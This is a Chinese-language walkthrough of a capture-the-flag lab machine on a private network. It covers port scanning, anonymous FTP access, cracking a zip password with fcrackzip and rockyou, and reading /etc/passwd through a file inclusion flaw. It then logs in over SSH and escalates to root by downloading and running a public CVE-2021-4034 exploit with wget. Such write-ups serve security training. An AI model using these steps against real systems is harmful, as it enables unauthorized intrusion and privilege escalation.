环境信息
攻击机:192.168.20.16
靶机:192.168.20.136
渗透过程
主机发现
arp-scan -l
端口扫描
nmap -T4 -sV -p- -A 192.168.20.136
开放了21,22,80端口,开放了ftp服务,ssh服务,web服务
21端口
FTP服务有时可以使用anonymous用户进行无密码登录
所以我们尝试是否能登陆进去
ftp 192.168.20.136
登录后ls查看一下目录里有一个respectmydrip.zip文件
将文件下载到本地
get respectmydrip.zip
压缩包加压需要密码,先收集其他信息
80端口
访问80端口有两个用户travisscott和thugger
通过目录扫描发现robots.txt路径
得到两个路径dripisreal.txt和/etc/dripispowerful.html分别进行访问
dripisreal.txt中得到的信息发现不出来什么信息
/etc/dripispowerful.html无法访问,在看地址怀疑有文件包含
fcrackzip密码破解
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
对respectmydrip.zip进行密码暴力破解
解压之后获得respectmydrip.txt文件和secret.zip文件,respectmydrip.txt文件是一条信息:just focus on "drip"。secret.zip文件同样需要密码,但是这个未破解出来。
文件包含漏洞
尝试利用文件包含漏洞,用file、include包含html文件,均失败了,想到刚刚在压缩包文件下的内容just focus on "drip",于是用drip进行文件包含
看到密码是imdrippinbiatch还提示用户是travisscott和thugger,这个时候尝试连接ssh服务
ssh服务
在包含etc/passwd文件时发现了thugger用户,我们尝试用此用户连接ssh
ssh thugger@192.168.20.136
id查看一个权限
ls查看本目录中的文件,发现user.txt
cat user.txt
打开发现第一个flag
提权
输入命令:sudo -l查看下当前可以使用的特权命令有哪些,显示不存在
find / -perm -4000 -type f 2>/dev/null
查看下具有root权限的文件,发现存在一个/usr/lib/policykit-1/polkit-agent-helper-1,可以使用CVE-2021-4034漏洞进行提权
wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip
unzip master.zip
cd CVE-2021-4034-master/
python3 cve2021-4034.py
提权成功后,使用id命令查看权限为root,进入到主目录cd /,查看到root目录下有root.txt文件,进行打开cat root.txt,得到第二个flag